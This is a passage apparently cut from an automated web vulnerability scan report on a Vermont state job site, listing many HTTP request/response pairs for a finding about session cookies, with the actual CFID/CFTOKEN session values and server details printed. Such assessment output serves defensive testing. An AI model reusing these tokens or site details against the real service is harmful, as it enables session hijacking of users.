Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
location: mn_empagreement_dsp.cfm
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off --> <!-- Caching is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_settings_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_ssncheck.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_veterans_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_warn_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada/mn_warninfo_dsp.cfm
Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/services/schools/schsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/FAQ.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/Login.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:04 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/contactus.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/employeroverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/joboverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
